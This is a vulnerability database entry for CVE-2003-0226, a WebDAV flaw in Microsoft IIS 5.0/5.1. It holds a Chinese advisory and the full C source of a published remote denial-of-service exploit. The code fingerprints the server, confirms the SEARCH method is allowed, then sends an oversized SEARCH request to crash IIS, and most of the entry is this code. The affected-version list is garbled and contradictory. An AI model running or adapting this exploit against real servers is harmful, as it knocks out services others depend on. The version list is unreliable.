MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit

2003-05-31T00:00:00
ID SSV:15237
Type seebug
Reporter Root
Modified 2003-05-31T00:00:00

Description

<p>漏洞描述: Microsoft IIS 5.0(Internet Infomation Server 5)是Microsoft Windows 2000自带的一个网络信息服务器,其中包含HTTP服务功能。IIS5 默认提供了对WebDAV的支持,通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。 WebDAV实现对部分模式的超长请求处理不正确,远程攻击者可以利用这个漏洞对IIS服务进行拒绝服务攻击。 攻击者可以使用'PROPFIND'或'SEARCH'请求方法,提交包含49,153字节的Webdav请求,IIS会由于拒绝服务而重新启动。不过IIS 5.0会自动重新启动。</p><p>CVE-ID:CVE-2003-0226</p><p>CNNVD-ID:CNNVD-200306-027</p><p>CVE官方链接:<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0226" rel="nofollow">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0226</a></p><p>- 受影响的程序版本 </p><p>Microsoft IIS 5.1 </p><p>- Microsoft Windows 2000 Advanced Server SP2 </p><p> - Microsoft Windows 2000 Advanced Server SP1 </p><p> - Microsoft Windows 2000 Advanced Server </p><p>  - Microsoft Windows 2000 Datacenter Server SP2 </p><p>- Microsoft Windows 2000 Datacenter Server SP1</p><p>  - Microsoft Windows 2000 Datacenter Server </p><p>  - Microsoft Windows 2000 Professional SP2</p><p>  - Microsoft Windows 2000 Professional SP1</p><p>  - Microsoft Windows 2000 Professional </p><p>  - Microsoft Windows 2000 Server SP2 </p><p> - Microsoft Windows 2000 Server SP1 </p><p> - Microsoft Windows 2000 Server </p><p>+ Microsoft Windows XP 64-bit Edition SP1 </p><p>+ Microsoft Windows XP 64-bit Edition </p><p>  + Microsoft Windows XP 64-bit Edition</p><p>   - Microsoft Windows XP Home SP1</p><p>  - Microsoft Windows XP Home SP1</p><p>  - Microsoft Windows XP Home </p><p>- Microsoft Windows XP Home </p><p>  + Microsoft Windows XP Professional SP1</p><p>  + Microsoft Windows XP Professional SP1 </p><p> + Microsoft Windows XP Professional </p><p>+ Microsoft Windows XP Professional Microsoft IIS 5.0 </p><p>- Microsoft Windows 2000 Advanced Server SP2</p><p>  - Microsoft Windows 2000 Advanced Server SP2</p><p>  - Microsoft Windows 2000 Advanced Server SP1 </p><p> - Microsoft Windows 2000 Advanced Server SP1</p><p>  + Microsoft Windows 2000 Advanced Server </p><p>+ Microsoft Windows 2000 Advanced Server </p><p>- Microsoft Windows 2000 Datacenter 
Server SP2</p><p>  - Microsoft Windows 2000 Datacenter Server SP2</p><p>  - Microsoft Windows 2000 Datacenter Server SP1 </p><p>- Microsoft Windows 2000 Datacenter Server SP1</p><p>  - Microsoft Windows 2000 Professional SP2 </p><p>- Microsoft Windows 2000 Professional SP2 </p><p> - Microsoft Windows 2000 Professional SP1 </p><p> - Microsoft Windows 2000 Professional SP1 </p><p>+ Microsoft Windows 2000 Professional </p><p>  + Microsoft Windows 2000 Professional </p><p>  - Microsoft Windows 2000 Server SP2</p><p>  - Microsoft Windows 2000 Server SP2</p><p>  - Microsoft Windows 2000 Server SP1</p><p>  - Microsoft Windows 2000 Server SP1 </p><p> + Microsoft Windows 2000 Server </p><p>  + Microsoft Windows 2000 Server Microsoft IIS 6.0 </p><p>+ Microsoft Windows Server 2003 Datacenter Edition</p><p>   + Microsoft Windows Server 2003 Datacenter Edition </p><p>  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Enterprise Edition </p><p>+ Microsoft Windows Server 2003 Enterprise Edition </p><p>+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0 </p><p> + Microsoft Windows Server 2003 Standard Edition </p><p>+ Microsoft Windows Server 2003 Standard Edition</p><p>   + Microsoft Windows Server 2003 Web Edition</p><p>   + Microsoft Windows Server 2003 Web Edition</p><p>  - 不受影响的程序版本 </p><p>Microsoft IIS 6.0 </p><p>+ Microsoft Windows Server 2003 Datacenter Edition </p><p>+ Microsoft Windows Server 2003 Datacenter Edition </p><p>  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0</p><p>  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Enterprise Edition</p><p>   + Microsoft Windows Server 2003 Enterprise Edition </p><p>  + Microsoft Windows Server 2003 Enterprise Edition Itanium 0</p><p>  + Microsoft Windows Server 2003 
Enterprise Edition Itanium 0 </p><p>+ Microsoft Windows Server 2003 Standard Edition </p><p>+ Microsoft Windows Server 2003 Standard Edition </p><p>+ Microsoft Windows Server 2003 Web Edition </p><p>+ Microsoft Windows Server 2003 Web Edition </p><p> </p><p>解决方案:官方已发布报告,请升级到不受影响的版本或最新版本。 </p>

                                        
                                            
                                                /*

Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit 

that makes use of the vulnerability recently published by SPI dynamics

Published on 31.05.2003

*/

#include &lt;windows.h&gt;
#include &lt;winsock.h&gt;
#include &lt;stdio.h&gt;

#pragma comment (lib,&quot;ws2_32&quot;)

/*
 * graphitte - print the tool's banner to stdout.
 *
 * Emits exactly the same bytes as the original five printf() calls.
 * None of the banner lines contains a conversion specification, so each
 * one is written with fputs() from a NULL-terminated table instead of
 * being passed to printf() as a format string.
 */
void graphitte()
{
    static const char *const banner[] = {
        &quot;\n********************************** &quot;,
        &quot;\n   Webdav MICROSOFT IIS DoS Exploit     * \n&quot;,
        &quot;+++++++++++++++++++++++++++++++*\n&quot;,
        &quot; by Shachank Pandrey                                *\n&quot;,
        &quot;*************************************\n&quot;,
        0
    };
    const char *const *line;

    for (line = banner; *line != 0; line++) {
        fputs(*line, stdout);
    }
}

/*
 * funk - open a TCP connection to port 80 on `host`, send the request
 * text in `tobesent` and hand back whatever the first recv() stored in
 * the local buffer `got`.
 *
 * Review notes (code left exactly as published):
 *  - `got` is an automatic array and is never initialised; the returned
 *    pointer dangles as soon as the function returns, so dereferencing
 *    it in the caller is undefined behavior.
 *  - recv() does not NUL-terminate `got` and its return value is
 *    ignored, so a later string search on the result can run past the
 *    100 bytes.
 *  - The array parameter `tobesent` is adjusted to `char *`, so
 *    sizeof(tobesent) is the size of a pointer; it is also a surplus
 *    sprintf() argument that the %s format never consumes.
 *  - socket()/connect() failures are only printed; execution falls
 *    through to send()/recv() on the failed descriptor. Winsock signals
 *    these with INVALID_SOCKET / SOCKET_ERROR; storing the SOCKET in an
 *    int and testing against -1 relies on the conversion.
 *  - Everything after `return got;` is unreachable: the socket is never
 *    closed and WSACleanup() is never reached from this function.
 *  - WSAStartup() is called here on every invocation and again in main().
 */
char *funk(char tobesent[100],char *host)
{
int s; char got[100]; 

WSADATA wsaData;

struct hostent *yo;
struct sockaddr_in heck;

char lala[100];


/* Winsock 1.1 requested; note that main() also initialises Winsock. */
if(WSAStartup(0x0101,&amp;wsaData)!=0) {
printf(&quot;error starting winsock..&quot;);
return 0;
}

if ((yo = gethostbyname(host))==0){
printf(&quot;error: can't resolve '%s'&quot;,host);
return 0;
}


/* heck is not zero-initialised, so sin_zero is left indeterminate. */
heck.sin_port = htons(80);
heck.sin_family = AF_INET;
heck.sin_addr = *((struct in_addr *)yo-&gt;h_addr);

/* Failure is reported but not acted on; s is still used below. */
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf(&quot;Error: Unable to create socket&quot;);

}


/* Same here: a failed connect() does not stop the send()/recv(). */
if ((connect(s, (struct sockaddr *) &amp;heck, sizeof(heck))) == -1){
printf(&quot;Error: Cudn't Connect\r\n&quot;);

}

memset(lala,0,sizeof(lala));

/* Unbounded %s copy into a 100-byte buffer; the fourth argument is
 * unused by the format (see header note on sizeof(tobesent)). */
sprintf(lala,&quot;%s&quot;,tobesent,sizeof(tobesent));

/* Return values of send()/recv() are not checked; got is not terminated. */
send(s,lala,strlen(lala),0);
recv(s,got,100,0);

/* Returns the address of a local array; the statements below never run. */
return got;
closesocket(s);
WSACleanup();
printf(&quot;done.\n&quot;);

}


/*
 * main - usage: program host-or-ip.
 *
 * Resolves argv[1], fetches the HTTP banner through funk() and requires
 * it to contain IIS/5.0, then sends a bare SEARCH request and requires
 * the 411 Length Required reply before sending the oversized SEARCH
 * request described in the advisory. It then reports on whether any
 * bytes came back.
 *
 * Review notes (code left exactly as published):
 *  - argc is validated only after WSAStartup(); the usage path and the
 *    exit(0) in the SEARCH-not-allowed branch leave without WSACleanup().
 *  - `gotme` is the address of funk()'s local buffer; both strstr()
 *    calls read through a dangling pointer (undefined behavior).
 *  - sprintf(mysend, ..., 40): the format has no conversion, so 40 is an
 *    unused argument.
 *  - `buffer[sizeof(buffer)]=0x00` writes one element past the end of
 *    buffer[65535]. memset() then fills all 65535 bytes with 'S' and
 *    leaves no terminator, so the %s that copies it into myrequest reads
 *    beyond the array.
 *  - The second sprintf() into myrequest passes myrequest itself as a
 *    source argument, which is undefined behavior for sprintf().
 *  - send()/recv() return values are ignored. `trash` is zero-filled
 *    beforehand, so a recv() failure or timeout also leaves trash[0]==0
 *    and the success message prints regardless of what happened.
 *  - Both the success and the failure path return 1.
 */
int main(int argc, char *argv[])
{

WSADATA wsaData;

int s;char mysend[100];
char *gotme;
char trash[100];


struct hostent *yo;
struct sockaddr_in heck;
/* 65535-byte filler for the request URI; see the out-of-bounds note above. */
char buffer[65535] =&quot;&quot;;
char myrequest[80000]; 
/* WebDAV SEARCH body; its strlen() is what Content-Length advertises. */
char content[] =
&quot;&lt;?xml version=\&quot;1.0\&quot;?&gt;\r\n&quot;
&quot;&lt;g:searchrequest xmlns:g=\&quot;DAV:\&quot;&gt;\r\n&quot;
&quot;&lt;g:sql&gt;\r\n&quot;
&quot;Select \&quot;DAV:displayname\&quot; from scope()\r\n&quot;
&quot;&lt;/g:sql&gt;\r\n&quot;
&quot;&lt;/g:searchrequest&gt;\r\n&quot;;



graphitte();

/* Winsock 1.1; funk() calls WSAStartup() again on each of its calls. */
if(WSAStartup(0x0101,&amp;wsaData)!=0) {
printf(&quot;Error :Cudn't initiate winsock!&quot;);
return 0;
}

/* Argument check happens after Winsock init; exit() skips WSACleanup(). */
if(argc&lt;2)

{printf(&quot;\nUsage : %s &lt;I.P./Hostname&gt;\n\n&quot;,argv[0]);
exit(0);}

if ( (yo = gethostbyname(argv[1]))==0)
{
printf(&quot;error: can't resolve '%s'&quot;,argv[1]);
return 1;
}

/* Banner fingerprint: funk() returns a dangling pointer (see header). */
printf(&quot;\nChecking web server %s\n&quot;,argv[1]);
gotme=(char *)funk(&quot;GET / HTTP/1.0\r\n\n&quot;,argv[1]);


if (strstr(gotme,&quot;IIS/5.0&quot;) == NULL)

{ printf(&quot;\n\r----&gt; %s is not running IIS 5.0! adios !\n&quot;,argv[1]); } 


else

{ 

printf(&quot;\n\r----&gt; Aww rite! IIS 5.0 found on %s !\n&quot;,argv[1]);

/* No conversion in the format; the 40 is never consumed. */
sprintf(mysend,&quot;SEARCH / HTTP/1.0\r\n\n&quot;,40);

gotme=(char *)funk(mysend,argv[1]);

/* A SEARCH without Content-Length is expected to draw a 411. */
if (strstr(gotme,&quot;HTTP/1.1 411 Length Required&quot;) != NULL)

{ printf(&quot;\n\r----&gt; METHOD SEARCH ALLOWED\r\n&quot;); } 


else

{

printf(&quot;\n----&gt; Method SEARCH not Allowed ! adios...\n&quot;);
exit(0);

} 

/* heck is not zero-initialised, so sin_zero is left indeterminate. */
heck.sin_port = htons(80);
heck.sin_family = AF_INET;
heck.sin_addr = *((struct in_addr *)yo-&gt;h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf(&quot;error: can't create socket&quot;);
return 1;
}


if ((connect(s, (struct sockaddr *) &amp;heck, sizeof(heck))) == -1){
printf(&quot;Error:Cudn't Connect\r\n&quot;);
return 1;
}

/* Index 65535 is one past the last element of buffer: out of bounds. */
buffer[sizeof(buffer)]=0x00;

/* Fills the whole array; no terminator remains for the %s below. */
memset(buffer,'S',sizeof(buffer));
memset(myrequest,0,sizeof(myrequest));
memset(trash,0,sizeof(trash));
sprintf(myrequest,&quot;SEARCH /%s HTTP/1.1\r\nHost: %s\r\
nContent-type: text/xml\r\nContent-Length: &quot;,buffer,argv[1]);
/* Destination passed as its own %s source: undefined for sprintf(). */
sprintf(myrequest,&quot;%s%d\r\n\r\n&quot;,myrequest,strlen(content));
printf(&quot;\r\nDoSsing the server...&lt;pray&gt;\n&quot;);
send(s,myrequest,strlen(myrequest),0);

send(s,content,strlen(content),0);

/* Return value ignored: trash stays zeroed on any recv() failure. */
recv(s,trash,sizeof(trash),0);
if(trash[0]==0x00) 
{
printf(&quot;Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n&quot;);

} 
else

printf(&quot;Server is prolly patched.\r\n&quot;);

closesocket(s);


}

WSACleanup();

return 1;
}

// milw0rm.com [2003-05-31]